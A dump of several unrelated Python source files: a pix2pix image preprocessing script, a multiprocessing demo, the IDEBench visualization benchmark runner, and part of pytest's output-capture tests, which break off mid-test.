testRunner = xmlrunner.XMLTestRunner(output='target/test-reports', verbosity=2)
except ImportError:
testRunner = None
unittest.main(testRunner=testRunner, verbosity=2)
|
process.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import os
import tempfile
import subprocess
import tensorflow as tf
import numpy as np
import tfimage as im
import threading
import time
import multiprocessing
edge_pool = None
parser = argparse.ArgumentParser()
parser.add_argument("--input_dir", required=True, help="path to folder containing images")
parser.add_argument("--output_dir", required=True, help="output path")
parser.add_argument("--operation", required=True, choices=["grayscale", "resize", "blank", "combine", "edges"])
parser.add_argument("--workers", type=int, default=1, help="number of workers")
# resize
parser.add_argument("--pad", action="store_true", help="pad instead of crop for resize operation")
parser.add_argument("--size", type=int, default=256, help="size to use for resize operation")
# combine
parser.add_argument("--b_dir", type=str, help="path to folder containing B images for combine operation")
a = parser.parse_args()
def resize(src):
height, width, _ = src.shape
dst = src
if height != width:
if a.pad:
size = max(height, width)
# pad to correct ratio
oh = (size - height) // 2
ow = (size - width) // 2
dst = im.pad(image=dst, offset_height=oh, offset_width=ow, target_height=size, target_width=size)
else:
# crop to correct ratio
size = min(height, width)
oh = (height - size) // 2
ow = (width - size) // 2
dst = im.crop(image=dst, offset_height=oh, offset_width=ow, target_height=size, target_width=size)
assert(dst.shape[0] == dst.shape[1])
size, _, _ = dst.shape
if size > a.size:
dst = im.downscale(images=dst, size=[a.size, a.size])
elif size < a.size:
dst = im.upscale(images=dst, size=[a.size, a.size])
return dst
def blank(src):
height, width, _ = src.shape
if height != width:
raise Exception("non-square image")
image_size = width
size = int(image_size * 0.3)
offset = int(image_size / 2 - size / 2)
dst = src
dst[offset:offset + size,offset:offset + size,:] = np.ones([size, size, 3])
return dst
def combine(src, src_path):
if a.b_dir is None:
raise Exception("missing b_dir")
# find corresponding file in b_dir, could have a different extension
basename, _ = os.path.splitext(os.path.basename(src_path))
for ext in [".png", ".jpg"]:
sibling_path = os.path.join(a.b_dir, basename + ext)
if os.path.exists(sibling_path):
sibling = im.load(sibling_path)
break
else:
raise Exception("could not find sibling image for " + src_path)
# make sure that dimensions are correct
height, width, _ = src.shape
if height != sibling.shape[0] or width != sibling.shape[1]:
raise Exception("differing sizes")
# convert both images to RGB if necessary
if src.shape[2] == 1:
src = im.grayscale_to_rgb(images=src)
if sibling.shape[2] == 1:
sibling = im.grayscale_to_rgb(images=sibling)
# remove alpha channel
if src.shape[2] == 4:
src = src[:,:,:3]
if sibling.shape[2] == 4:
sibling = sibling[:,:,:3]
return np.concatenate([src, sibling], axis=1)
def grayscale(src):
return im.grayscale_to_rgb(images=im.rgb_to_grayscale(images=src))
net = None
def run_caffe(src):
# lazy load caffe and create net
global net
if net is None:
# don't require caffe unless we are doing edge detection
os.environ["GLOG_minloglevel"] = "2" # disable logging from caffe
import caffe
# using this requires using the docker image or assembling a bunch of dependencies
# and then changing these hardcoded paths
net = caffe.Net("/opt/caffe/examples/hed/deploy.prototxt", "/opt/caffe/hed_pretrained_bsds.caffemodel", caffe.TEST)
net.blobs["data"].reshape(1, *src.shape)
net.blobs["data"].data[...] = src
net.forward()
return net.blobs["sigmoid-fuse"].data[0][0,:,:]
def edges(src):
# based on https://github.com/phillipi/pix2pix/blob/master/scripts/edges/batch_hed.py
# and https://github.com/phillipi/pix2pix/blob/master/scripts/edges/PostprocessHED.m
import scipy.io
src = src * 255
border = 128  # pad the image, since the edge detector tends to fire on the image border
src = src[:,:,:3] # remove alpha channel if present
src = np.pad(src, ((border, border), (border, border), (0,0)), "reflect")
src = src[:,:,::-1]
src -= np.array((104.00698793,116.66876762,122.67891434))
src = src.transpose((2, 0, 1))
# [height, width, channels] => [channels, height, width]; run_caffe adds the batch dimension
fuse = edge_pool.apply(run_caffe, [src])
fuse = fuse[border:-border, border:-border]
with tempfile.NamedTemporaryFile(suffix=".png") as png_file, tempfile.NamedTemporaryFile(suffix=".mat") as mat_file:
scipy.io.savemat(mat_file.name, {"input": fuse})
octave_code = r"""
E = 1-load(input_path).input;
E = imresize(E, [image_width,image_width]);
E = 1 - E;
E = single(E);
[Ox, Oy] = gradient(convTri(E, 4), 1);
[Oxx, ~] = gradient(Ox, 1);
[Oxy, Oyy] = gradient(Oy, 1);
O = mod(atan(Oyy .* sign(-Oxy) ./ (Oxx + 1e-5)), pi);
E = edgesNmsMex(E, O, 1, 5, 1.01, 1);
E = double(E >= max(eps, threshold));
E = bwmorph(E, 'thin', inf);
E = bwareaopen(E, small_edge);
E = 1 - E;
E = uint8(E * 255);
imwrite(E, output_path);
"""
config = dict(
input_path="'%s'" % mat_file.name,
output_path="'%s'" % png_file.name,
image_width=256,
threshold=25.0/255.0,
small_edge=5,
)
args = ["octave"]
for k, v in config.items():
args.extend(["--eval", "%s=%s;" % (k, v)])
args.extend(["--eval", octave_code])
try:
subprocess.check_output(args, stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as e:
print("octave failed")
print("returncode:", e.returncode)
print("output:", e.output)
raise
return im.load(png_file.name)
def process(src_path, dst_path):
src = im.load(src_path)
if a.operation == "grayscale":
dst = grayscale(src)
elif a.operation == "resize":
dst = resize(src)
elif a.operation == "blank":
dst = blank(src)
elif a.operation == "combine":
dst = combine(src, src_path)
elif a.operation == "edges":
dst = edges(src)
else:
raise Exception("invalid operation")
im.save(dst, dst_path)
complete_lock = threading.Lock()
start = None
num_complete = 0
total = 0
def complete():
global num_complete, rate, last_complete
with complete_lock:
num_complete += 1
now = time.time()
elapsed = now - start
rate = num_complete / elapsed
if rate > 0:
remaining = (total - num_complete) / rate
else:
remaining = 0
print("%d/%d complete %0.2f images/sec %dm%ds elapsed %dm%ds remaining" % (num_complete, total, rate, elapsed // 60, elapsed % 60, remaining // 60, remaining % 60))
last_complete = now
def main():
if not os.path.exists(a.output_dir):
os.makedirs(a.output_dir)
src_paths = []
dst_paths = []
skipped = 0
for src_path in im.find(a.input_dir):
name, _ = os.path.splitext(os.path.basename(src_path))
dst_path = os.path.join(a.output_dir, name + ".png")
if os.path.exists(dst_path):
skipped += 1
else:
src_paths.append(src_path)
dst_paths.append(dst_path)
print("skipping %d files that already exist" % skipped)
global total
total = len(src_paths)
print("processing %d files" % total)
global start
start = time.time()
if a.operation == "edges":
# use a multiprocessing pool for this operation so it can use multiple CPUs
# create the pool before we launch processing threads
global edge_pool
edge_pool = multiprocessing.Pool(a.workers)
if a.workers == 1:
with tf.Session() as sess:
for src_path, dst_path in zip(src_paths, dst_paths):
print("processing {}".format(src_path))
process(src_path, dst_path)
complete()
else:
queue = tf.train.input_producer(zip(src_paths, dst_paths), shuffle=False, num_epochs=1)
dequeue_op = queue.dequeue()
def worker(coord):
with sess.as_default():
while not coord.should_stop():
try:
src_path, dst_path = sess.run(dequeue_op)
except tf.errors.OutOfRangeError:
coord.request_stop()
break
process(src_path, dst_path)
complete()
# init epoch counter for the queue
local_init_op = tf.local_variables_initializer()
with tf.Session() as sess:
sess.run(local_init_op)
coord = tf.train.Coordinator()
threads = tf.train.start_queue_runners(coord=coord)
for i in range(a.workers):
t = threading.Thread(target=worker, args=(coord,))
t.start()
threads.append(t)
try:
coord.join(threads)
except KeyboardInterrupt:
coord.request_stop()
coord.join(threads)
main()
|
pool_multiprocessing.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from multiprocessing import Pool, Process, Queue, Pipe, TimeoutError  # Queue is thread-safe
# from multiprocessing.dummy import Pool, Process, Queue, Pipe  # thread-based equivalents
from time import sleep
import threading
def f(x):
# print(threading.currentThread().getName(), threading.currentThread().ident)
sleep(0.1)
return x*x
def f1(q):
q.put([42, None, 'Queue'])
def f2(conn):
conn.send([43, None, 'Pipe'])
conn.close()
if __name__ == '__main__':
# Communicate via a Queue
q = Queue()
p = Process(target=f1, args=(q,))
p.start()
print(q.get()) # prints "[42, None, 'Queue']"
p.join()
# Communicate via a Pipe
parent_conn, child_conn = Pipe()
p = Process(target=f2, args=(child_conn,))
p.start()
print(parent_conn.recv()) # prints "[43, None, 'Pipe']"
p.join()
# thread pool
# start 4 worker processes/threads
with Pool(processes=4) as pool:
# print "[0, 1, 4,..., 81]"
print(pool.map(f, range(10)))
# print same numbers in arbitrary order
# for i in pool.imap_unordered(f, range(10)):
# print(i)
print(list(pool.imap_unordered(f, range(10))))
# evaluate "f(10)" asynchronously
res = pool.apply_async(f, [10])
print(res.get(timeout=1)) # prints "100"
# make worker sleep for 10 secs
res = pool.apply_async(sleep, [10])
# raises multiprocessing.TimeoutError
print(res.get(timeout=1))
# exiting the 'with'-block has stopped the pool
'''
Run multiprocessing/threading tasks synchronously or asynchronously.
ref:
https://docs.python.org/3/library/multiprocessing.html
'''
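# --- Editor's sketch (not in the original file): asynchronous execution with callbacks ---
# Besides blocking on AsyncResult.get(), apply_async/map_async can deliver results through
# callbacks, which is the fully asynchronous style the note above refers to.
def _demo_async_callbacks():
    collected = []
    with Pool(processes=4) as pool:
        async_result = pool.map_async(
            f, range(10),
            callback=collected.extend,                      # called once with the full result list
            error_callback=lambda exc: print("worker failed:", exc),
        )
        async_result.wait()                                 # block until all tasks are done
    print(collected)                                        # [0, 1, 4, ..., 81]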
|
idebench.py
|
import importlib
import json
import csv
import time
import hashlib
import multiprocessing
import statistics
import numpy as np
import os
from common.schema import Schema
from common.vizgraph import VizGraph
from common.vizrequest import VizRequest
from common.operation import Operation
from optparse import OptionParser
from scipy import spatial
import glob
from os.path import basename
class IDEBench:
result_queue = multiprocessing.Queue()
def __init__(self):
parser = OptionParser()
parser.add_option("--driver-name", dest="driver_name", action="store", help="Driver name")
parser.add_option("--driver-create-storage", dest="driver_create_storage", action="store_true", help="Calls create_storage on driver", default=False)
parser.add_option("--driver-clear-storage", dest="driver_clear_storage", action="store_true", help="Calls clear_storage on driver", default=False)
parser.add_option("--driver-clear-cache", dest="driver_clear_cache", action="store_true", help="Calls clear_cache on driver", default=False)
parser.add_option("--driver-args", dest="driver_args", action="store", help="Arguments to pass to the driver", default="")
parser.add_option("--settings-normalized", dest="settings_normalized", action="store_true", help="Whether joins should be used", default=False)
parser.add_option("--settings-dataset", dest="settings_dataset", action="store", help="Name of the dataset")
parser.add_option("--settings-size", dest="settings_size", default="", action="store", help="Number of rows in the dataset")
        parser.add_option("--settings-thinktime", dest="settings_thinktime", type="int", action="store", help="Think-time in milliseconds between two interactions", default=1000)
        parser.add_option("--settings-time-requirement", dest="settings_time_requirement", action="store", help="The time requirement to be used", default=1000)
parser.add_option("--settings-confidence-level", dest="settings_confidence_level", action="store", help="The confidence level to be used", default=95)
parser.add_option("--settings-workflow", dest="settings_workflow", action="store", help="The workflow file to be used")
        parser.add_option("--evaluate", dest="evaluate", action="store_true", help="Evaluates the results of a benchmark run", default=False)
        parser.add_option("--create-full-report", dest="create_report", action="store_true", help="Merges all reports in the reports directory into a single file", default=False)
parser.add_option("--run", dest="run", action="store_true", help="Flag to run the benchmark without config file", default=False)
parser.add_option("--run-config", dest="config", action="store", help="Flag to run the benchmark with the specified config file")
parser.add_option("--groundtruth", dest="groundtruth", action="store_true", help="If set computes the ground-truth for the specified workflow", default=False)
        parser.add_option("--viz_n", dest="viz_number", action="store", type=int, help="Number of visualizations", default=4)
(self.options, args) = parser.parse_args()
if not self.options.config:
if self.options.create_report:
self.create_report()
return
if not self.options.driver_name:
parser.error("No driver name specified.")
if not self.options.settings_dataset:
parser.error("No dataset specified.")
if not self.options.settings_size:
print("Warning: No dataset size specified.")
if self.options.groundtruth or self.options.run:
self.setup()
if self.options.groundtruth:
                self.options.settings_thinktime = 1
                self.options.settings_time_requirement = 999999
workflow_files = glob.glob("data/" + self.options.settings_dataset + "/workflows/*.json")
for workflow_file in workflow_files:
self.options.settings_workflow = basename(workflow_file).split(".")[0]
self.run()
elif self.options.run:
if not self.options.settings_workflow:
parser.error("No workflow specified.")
self.run()
elif self.options.evaluate:
self.evaluate(self.get_config_hash())
else:
with open(self.options.config) as f:
config = json.load(f)
assure_path_exists("./results")
for d in config["settings-datasets"]:
assure_path_exists("./data/%s/groundtruths" % d)
# TODO: create pairs instead
for dataset in config["settings-datasets"]:
self.options.settings_dataset = dataset
for driver_name in config["driver-names"]:
for driver_arg in config["driver-args"]:
self.options.driver_name = driver_name
self.setup(driver_arg)
for size in config["settings-sizes"]:
for workflow in config["settings-workflows"]:
for thinktime in config["settings-thinktimes"]:
for time_requirement in config["settings-time-requirements"]:
for confidence_level in config["settings-confidence-levels"]:
self.options.driver_name = driver_name
self.options.settings_size = size
self.options.settings_workflow = workflow
self.options.settings_thinktime = thinktime
self.options.settings_time_requirement = time_requirement
self.options.settings_confidence_level = confidence_level
self.options.settings_normalized = config["settings-normalized"]
self.options.groundtruth = config["groundtruth"] if "groundtruth" in config else False
self.options.run = config["run"] if "run" in config else True
self.options.evaluate = config["evaluate"] if "evaluate" in config else True
if self.options.run:
self.run()
if self.options.evaluate:
self.evaluate(self.get_config_hash())
def setup(self, driver_arg = None):
with open(self.get_schema_path()) as f:
self.schema = Schema(json.load(f), self.options.settings_normalized)
module = importlib.import_module("drivers." + self.options.driver_name)
self.driver = getattr(module, "IDEBenchDriver")()
try:
self.driver.init(self.options, self.schema, driver_arg)
except AttributeError:
pass
def run(self):
try:
self.driver.workflow_start()
except AttributeError:
pass
with open(self.get_workflow_path()) as f:
self.workflow_interactions = json.load(f)["interactions"]
self.vizgraph = VizGraph(self.options.viz_number)
self.operation_results = { "args": vars(self.options), "results": {} }
self.current_interaction_index = 0
self.current_vizrequest_index = 0
self.process_interaction(0)
def end_run(self):
try:
self.driver.workflow_end()
except AttributeError:
pass
path = "results/%s.json" % (self.get_config_hash())
if not self.options.groundtruth:
with open(path, "w") as fp:
json.dump(self.operation_results, fp, indent=4)
if self.options.groundtruth:
path = "data/%s/groundtruths/%s_%s.json" % (self.options.settings_dataset, self.options.settings_size, self.options.settings_workflow)
with open(path, "w") as fp:
json.dump(self.operation_results, fp, indent=4)
def process_interaction(self, interaction_index):
print("processing!")
if interaction_index < 0 or interaction_index >= len(self.workflow_interactions):
print("reached end of interactions")
self.end_run()
return
print("thinking...")
time.sleep(self.options.settings_thinktime / 1000)
interaction = self.workflow_interactions[interaction_index]
vizs_to_request = self.vizgraph.apply_interaction(Operation(interaction))
viz_requests = []
for viz in vizs_to_request:
viz_requests.append(VizRequest(self.current_vizrequest_index, self.current_interaction_index, viz))
self.current_vizrequest_index += 1
#if interaction_index == 0:
# self.result_queue = multiprocessing.Queue()
# TODO: document this feature
try:
self.driver.before_requests(self.options, self.schema, IDEBench.result_queue)
except AttributeError:
pass
procs = []
nprocs = len(viz_requests)
if hasattr(self.driver, "use_single_process") and self.driver.use_single_process:
for viz_request in viz_requests:
self.driver.process_request(viz_request, self.options, self.schema, IDEBench.result_queue)
else:
for viz_request in viz_requests:
proc = multiprocessing.Process(target=self.driver.process_request, args=(viz_request, self.options, self.schema, IDEBench.result_queue))
procs.append(proc)
proc.start()
resultlist = []
for i in range(nprocs):
resultlist.append(IDEBench.result_queue.get())
for proc in procs:
proc.join()
self.deliver_viz_request(resultlist)
self.current_interaction_index += 1
self.process_interaction(self.current_interaction_index)
def deliver_viz_request(self, viz_requests):
for viz_request in viz_requests:
if len(viz_request.result.keys()) == 0:
pass
operation_result = {}
operation_result["id"] = viz_request.operation_id
operation_result["sql"] = viz_request.viz.get_computed_filter_as_sql(self.schema)
operation_result["viz_name"] = viz_request.viz.name
operation_result["parent_operation_id"] = viz_request.parent_operation_id
operation_result["start_time"] = viz_request.start_time
operation_result["end_time"] = viz_request.end_time
operation_result["time_violated"] = viz_request.timedout
operation_result["t_pause"] = viz_request.t_pause
operation_result["t_start"] = viz_request.t_start
operation_result["progress"] = viz_request.progress
operation_result["output"] = viz_request.result
operation_result["margins"] = viz_request.margins
operation_result["num_binning_dimensions"] = len(viz_request.viz.binning)
operation_result["num_aggregates_per_bin"] = len(viz_request.viz.per_bin_aggregates)
bin_types = []
for viz_bin in viz_request.viz.binning:
if "width" in viz_bin:
bin_types.append("quantitative")
else:
bin_types.append("nominal")
operation_result["binning_type"] = "_".join(sorted(bin_types))
agg_types = []
for viz_agg in viz_request.viz.per_bin_aggregates:
if viz_agg["type"] == "count":
agg_types.append("count")
elif viz_agg["type"] == "avg":
agg_types.append("avg")
else:
raise Exception()
operation_result["aggregate_type"] = "_".join(sorted(agg_types))
            if viz_request.operation_id not in self.operation_results["results"]:
                self.operation_results["results"][viz_request.operation_id] = operation_result
viz_request.delivered = True
#self.driver.request_vizs(self.viz_requests)
def get_config_hash(self):
o = self.options
        h = (o.driver_name, o.settings_dataset, o.settings_workflow, o.settings_size, o.settings_normalized, o.settings_confidence_level, o.settings_thinktime, o.settings_time_requirement)
return hashlib.md5(str(h).encode('utf-8')).hexdigest()
def get_schema_path(self):
return "data/%s/sample.json" % (self.options.settings_dataset)
def get_workflow_path(self):
return "data/%s/workflows/%s.json" % (self.options.settings_dataset, self.options.settings_workflow)
def compute_viz_similarity(self, viz_gt, viz):
if len(viz.keys()) == 0 and len(viz_gt.keys()) == 0:
return 1
if len(viz_gt.keys()) == 0 and len(viz.keys()) > 0:
raise Exception()
if len(viz_gt.keys()) > 0 and len(viz.keys()) == 0:
return 0
for gt_key in viz_gt.keys():
if gt_key not in viz:
viz[gt_key] = 0
viz_gt_vals = []
viz_vals = []
for gt_key in viz_gt.keys():
if isinstance(viz_gt[gt_key], list):
viz_gt_vals.append(viz_gt[gt_key][0])
else:
viz_gt_vals.append(viz_gt[gt_key])
if isinstance(viz[gt_key], list):
viz_vals.append(viz[gt_key][0])
else:
viz_vals.append(viz[gt_key])
viz_gt_vals = np.array(viz_gt_vals).astype(float)
viz_vals = np.array(viz_vals).astype(float)
#viz_gt_vals = self.normalize(viz_gt_vals)
#viz_vals = self.normalize(viz_vals)
if np.isnan(viz_gt_vals).any():
raise Exception()
if np.isnan(viz_vals).any():
raise Exception()
#score = np.dot(viz_gt_vals, viz_vals)/ ( np.sqrt(np.sum(np.square(viz_gt_vals))) * np.sqrt(np.sum(np.square(viz_vals))) )
np.seterr(all='raise')
        try:
            score = 1 - spatial.distance.cosine(viz_gt_vals, viz_vals)
        except Exception:
            return 0
return score if not np.isnan(score) else 0
    def normalize(self, v):
        norm = np.linalg.norm(v, ord=1)
        if norm == 0:
            norm = np.finfo(v.dtype).eps
        return v / norm
def evaluate(self, config_hash):
print("evaluate")
result_json = None
try:
with open("results/%s.json" % config_hash, "r") as json_data:
result_json = json.load(json_data)
        except Exception:
print("couldn't load file %s" % ("results/%s.json" % config_hash))
return
workflow = result_json["args"]["settings_workflow"]
dataset = result_json["args"]["settings_dataset"]
size = result_json["args"]["settings_size"]
time_requirement = result_json["args"]["settings_time_requirement"]
with open("data/%s/groundtruths/%s_%s.json" % (dataset, size, workflow), "r") as json_data:
groundtruths = json.load(json_data)["results"]
with open("reports/%s.csv" % config_hash, 'w') as fp:
w = csv.DictWriter(fp, [
"operation_id",
"config_hash",
"interaction_id",
"dataset",
"size",
"viz_name",
"interface",
"think_time",
"time_requirement",
"t_start",
"t_pause",
"workflow",
"start_time",
"end_time",
"duration",
"progress",
"time_violated",
"num_binning_dimensions",
"binning_type",
"has_invalid_bins",
"num_bins_out_of_margin",
"num_bins_delivered",
"num_bins_in_gt",
"missing_bins",
"dissimilarity",
"num_aggregates_per_bin",
"aggregate_type",
"bias",
"rel_error_avg",
"rel_error_stdev",
"rel_error_min",
"rel_error_max",
"margin_avg",
"margin_stdev",
"margin_min",
"margin_max",
"margin_ratio"], delimiter=",", lineterminator="\n")
w.writeheader()
operations = result_json["results"]
for op_number in operations.keys():
gt_output = groundtruths[op_number]["output"]
operation = operations[op_number]
margins = []
rel_errors = []
forecast_values = []
actual_values = []
out_of_margin_count = 0
for gt_bin_identifier, gt_aggregate_results in gt_output.items():
if gt_bin_identifier in operation["output"]:
for agg_bin_result_index, agg_bin_result in enumerate(operation["output"][gt_bin_identifier]):
rel_error = None
op_result = operation["output"][gt_bin_identifier][agg_bin_result_index]
gt_result = gt_aggregate_results[agg_bin_result_index]
if abs(gt_result) > 0:
rel_error = abs(op_result - gt_result)/abs(gt_result)
if rel_error > 1e-5:
pass
rel_errors.append(rel_error)
else:
print("ignoring zero in groundtruth")
forecast_values.append(op_result)
actual_values.append(gt_result)
if operation["margins"] and gt_bin_identifier in operation["margins"]:
op_margin = float(operation["margins"][gt_bin_identifier][agg_bin_result_index])
if np.isnan(op_margin) or np.isinf(op_margin) or abs(op_margin) > 1000000:
if os.path.exists("./margin_errors"):
append_write = 'a' # append if already exists
else:
append_write = 'w' # make a new file if not
with open("./margin_errors", append_write) as ffff:
ffff.writelines(self.options.settings_workflow + "\n" + str(operation["margins"][gt_bin_identifier][agg_bin_result_index]) + "\n")
elif gt_result + 1e-6 < op_result - abs(op_result * op_margin) or gt_result - 1e-6 > op_result + abs(op_result * op_margin):
out_of_margin_count += 1
margins.append(abs(op_margin))
else:
margins.append(abs(op_margin))
else:
pass
# add error as many times as a bin was expected!
#rel_errors.extend( [ 1 for n in range(len(gt_aggregate_results)) ] )
# invalid bins test
has_invalid_bins = False
num_invalid = 0
inv = []
for kk in operation["output"].keys():
if kk not in gt_output:
has_invalid_bins = True
num_invalid += 1
inv.append(kk)
print(self.options.settings_workflow)
print(str(operation["id"]))
print("invalid key:" + kk)
print(operation["sql"])
print(operation["output"])
os._exit(0)
args = result_json["args"]
missing_bins = 1 - len(operation["output"].keys()) / len(gt_output.keys()) if len(gt_output.keys()) > 0 else 0
op_eval_result = {}
op_eval_result["operation_id"] = operation["id"]
op_eval_result["config_hash"] = self.get_config_hash()
op_eval_result["interaction_id"] = operation["parent_operation_id"]
op_eval_result["dataset"] = args["settings_dataset"]
op_eval_result["size"] = args["settings_size"]
op_eval_result["viz_name"] = operation["viz_name"]
op_eval_result["think_time"] = args["settings_thinktime"]
op_eval_result["time_requirement"] = args["settings_time_requirement"]
op_eval_result["interface"] = args["driver_name"]
op_eval_result["workflow"] = args["settings_workflow"]
op_eval_result["start_time"] = operation["start_time"]
op_eval_result["end_time"] = operation["end_time"]
op_eval_result["t_pause"] = operation["t_pause"] if "t_pause" in operation else 0
op_eval_result["t_start"] = operation["t_start"] if "t_start" in operation else 0
op_eval_result["duration"] = operation["end_time"] - operation["start_time"]
if "time_violated" in operation:
op_eval_result["time_violated"] = operation["time_violated"]
elif "timedout" in operation:
op_eval_result["time_violated"] = operation["timedout"]
else:
raise Exception()
op_eval_result["has_invalid_bins"] = has_invalid_bins
op_eval_result["binning_type"] = operation["binning_type"]
op_eval_result["aggregate_type"] = operation["aggregate_type"]
op_eval_result["num_bins_delivered"] = len(operation["output"].keys())
op_eval_result["num_bins_in_gt"] = len(gt_output.items())
op_eval_result["missing_bins"] = "%.5f" % missing_bins
op_eval_result["dissimilarity"] = "%.5f" % (1- self.compute_viz_similarity(gt_output, operation["output"]))
op_eval_result["num_bins_out_of_margin"] = "%i" % out_of_margin_count
op_eval_result["num_aggregates_per_bin"] = operation["num_aggregates_per_bin"]
op_eval_result["num_binning_dimensions"] = operation["num_binning_dimensions"]
op_eval_result["progress"] = "%.5f" % operation["progress"]
                op_eval_result["bias"] = "%.5f" % (sum(forecast_values) / sum(actual_values) - 1) if len(actual_values) > 0 else 0
op_eval_result["rel_error_stdev"] = "%.5f" % statistics.stdev(rel_errors) if len(rel_errors) > 1 else 0.0
op_eval_result["rel_error_min"] = "%.5f" % min(rel_errors) if len(rel_errors) > 0 else 0
op_eval_result["rel_error_max"] = "%.5f" % max(rel_errors) if len(rel_errors) > 0 else 0
op_eval_result["rel_error_avg"] = "%.5f" % float(sum(rel_errors) / float(len(rel_errors))) if len(rel_errors) > 0 else 0
op_eval_result["margin_stdev"] = "%.5f" % statistics.stdev(margins) if len(margins) > 1 else 0.0
op_eval_result["margin_min"] = "%.5f" % min(margins) if len(margins) > 0 else 0.0
op_eval_result["margin_max"] = "%.5f" % max(margins) if len(margins) > 0 else 0.0
op_eval_result["margin_avg"] = "%.5f" % float(sum(margins) / float(len(margins))) if len(margins) > 0 else 0.0
op_eval_result["margin_ratio"] = "%.5f" % float(len(operation["margins"]) / len(operation["output"])) if operation["margins"] and len(operation["output"]) > 0 else 1
w.writerow(op_eval_result)
def create_report(self):
header_saved = False
interesting_files = glob.glob("reports/*.csv")
with open('./full_report.csv','w') as fout:
for filename in interesting_files:
print(filename)
with open(filename) as fin:
header = next(fin)
if not header_saved:
print(header)
fout.write(header)
header_saved = True
for line in fin:
fout.write(line)
print("saved report")
def assure_path_exists(path):
    # callers pass directory paths, so create the directory itself
    if not os.path.isdir(path):
        os.makedirs(path)
if __name__ == '__main__':
IDEBench()
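# --- Editor's sketch (not part of the original benchmark code) ---
# compute_viz_similarity above reduces each visualization to a vector of per-bin aggregate
# values (missing bins filled with 0) and compares it to the ground truth with cosine
# similarity; the CSV column "dissimilarity" is 1 minus that similarity.
def _cosine_dissimilarity_example():
    gt = np.array([10.0, 5.0, 0.0, 2.0])       # ground-truth aggregates per bin
    approx = np.array([9.0, 6.0, 0.0, 0.0])    # approximate answer; one bin was not delivered
    similarity = 1 - spatial.distance.cosine(gt, approx)
    return 1 - similarity                       # equals spatial.distance.cosine(gt, approx)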
|
test_capture.py
|
import contextlib
import io
import os
import subprocess
import sys
import textwrap
from io import UnsupportedOperation
from typing import BinaryIO
from typing import Generator
import pytest
from _pytest import capture
from _pytest.capture import _get_multicapture
from _pytest.capture import CaptureManager
from _pytest.capture import MultiCapture
from _pytest.config import ExitCode
# note: py.io capture tests were copied from
# pylib 1.4.20.dev2 (rev 13d9af95547e)
def StdCaptureFD(out=True, err=True, in_=True):
return capture.MultiCapture(out, err, in_, Capture=capture.FDCapture)
def StdCapture(out=True, err=True, in_=True):
return capture.MultiCapture(out, err, in_, Capture=capture.SysCapture)
def TeeStdCapture(out=True, err=True, in_=True):
return capture.MultiCapture(out, err, in_, Capture=capture.TeeSysCapture)
class TestCaptureManager:
@pytest.mark.parametrize("method", ["no", "sys", "fd"])
def test_capturing_basic_api(self, method):
capouter = StdCaptureFD()
old = sys.stdout, sys.stderr, sys.stdin
try:
capman = CaptureManager(method)
capman.start_global_capturing()
capman.suspend_global_capture()
outerr = capman.read_global_capture()
assert outerr == ("", "")
capman.suspend_global_capture()
outerr = capman.read_global_capture()
assert outerr == ("", "")
print("hello")
capman.suspend_global_capture()
out, err = capman.read_global_capture()
if method == "no":
assert old == (sys.stdout, sys.stderr, sys.stdin)
else:
assert not out
capman.resume_global_capture()
print("hello")
capman.suspend_global_capture()
out, err = capman.read_global_capture()
if method != "no":
assert out == "hello\n"
capman.stop_global_capturing()
finally:
capouter.stop_capturing()
def test_init_capturing(self):
capouter = StdCaptureFD()
try:
capman = CaptureManager("fd")
capman.start_global_capturing()
pytest.raises(AssertionError, capman.start_global_capturing)
capman.stop_global_capturing()
finally:
capouter.stop_capturing()
@pytest.mark.parametrize("method", ["fd", "sys"])
def test_capturing_unicode(testdir, method):
obj = "'b\u00f6y'"
testdir.makepyfile(
"""\
# taken from issue 227 from nosetests
def test_unicode():
import sys
print(sys.stdout)
print(%s)
"""
% obj
)
result = testdir.runpytest("--capture=%s" % method)
result.stdout.fnmatch_lines(["*1 passed*"])
@pytest.mark.parametrize("method", ["fd", "sys"])
def test_capturing_bytes_in_utf8_encoding(testdir, method):
testdir.makepyfile(
"""\
def test_unicode():
print('b\\u00f6y')
"""
)
result = testdir.runpytest("--capture=%s" % method)
result.stdout.fnmatch_lines(["*1 passed*"])
def test_collect_capturing(testdir):
p = testdir.makepyfile(
"""
import sys
print("collect %s failure" % 13)
sys.stderr.write("collect %s_stderr failure" % 13)
import xyz42123
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*Captured stdout*",
"collect 13 failure",
"*Captured stderr*",
"collect 13_stderr failure",
]
)
class TestPerTestCapturing:
def test_capture_and_fixtures(self, testdir):
p = testdir.makepyfile(
"""
def setup_module(mod):
print("setup module")
def setup_function(function):
print("setup " + function.__name__)
def test_func1():
print("in func1")
assert 0
def test_func2():
print("in func2")
assert 0
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"setup module*",
"setup test_func1*",
"in func1*",
"setup test_func2*",
"in func2*",
]
)
@pytest.mark.xfail(reason="unimplemented feature")
def test_capture_scope_cache(self, testdir):
p = testdir.makepyfile(
"""
import sys
def setup_module(func):
print("module-setup")
def setup_function(func):
print("function-setup")
def test_func():
print("in function")
assert 0
def teardown_function(func):
print("in teardown")
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*test_func():*",
"*Captured stdout during setup*",
"module-setup*",
"function-setup*",
"*Captured stdout*",
"in teardown*",
]
)
def test_no_carry_over(self, testdir):
p = testdir.makepyfile(
"""
def test_func1():
print("in func1")
def test_func2():
print("in func2")
assert 0
"""
)
result = testdir.runpytest(p)
s = result.stdout.str()
assert "in func1" not in s
assert "in func2" in s
def test_teardown_capturing(self, testdir):
p = testdir.makepyfile(
"""
def setup_function(function):
print("setup func1")
def teardown_function(function):
print("teardown func1")
assert 0
def test_func1():
print("in func1")
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*teardown_function*",
"*Captured stdout*",
"setup func1*",
"in func1*",
"teardown func1*",
# "*1 fixture failure*"
]
)
def test_teardown_capturing_final(self, testdir):
p = testdir.makepyfile(
"""
def teardown_module(mod):
print("teardown module")
assert 0
def test_func():
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*def teardown_module(mod):*",
"*Captured stdout*",
"*teardown module*",
"*1 error*",
]
)
def test_capturing_outerr(self, testdir):
p1 = testdir.makepyfile(
"""\
import sys
def test_capturing():
print(42)
sys.stderr.write(str(23))
def test_capturing_error():
print(1)
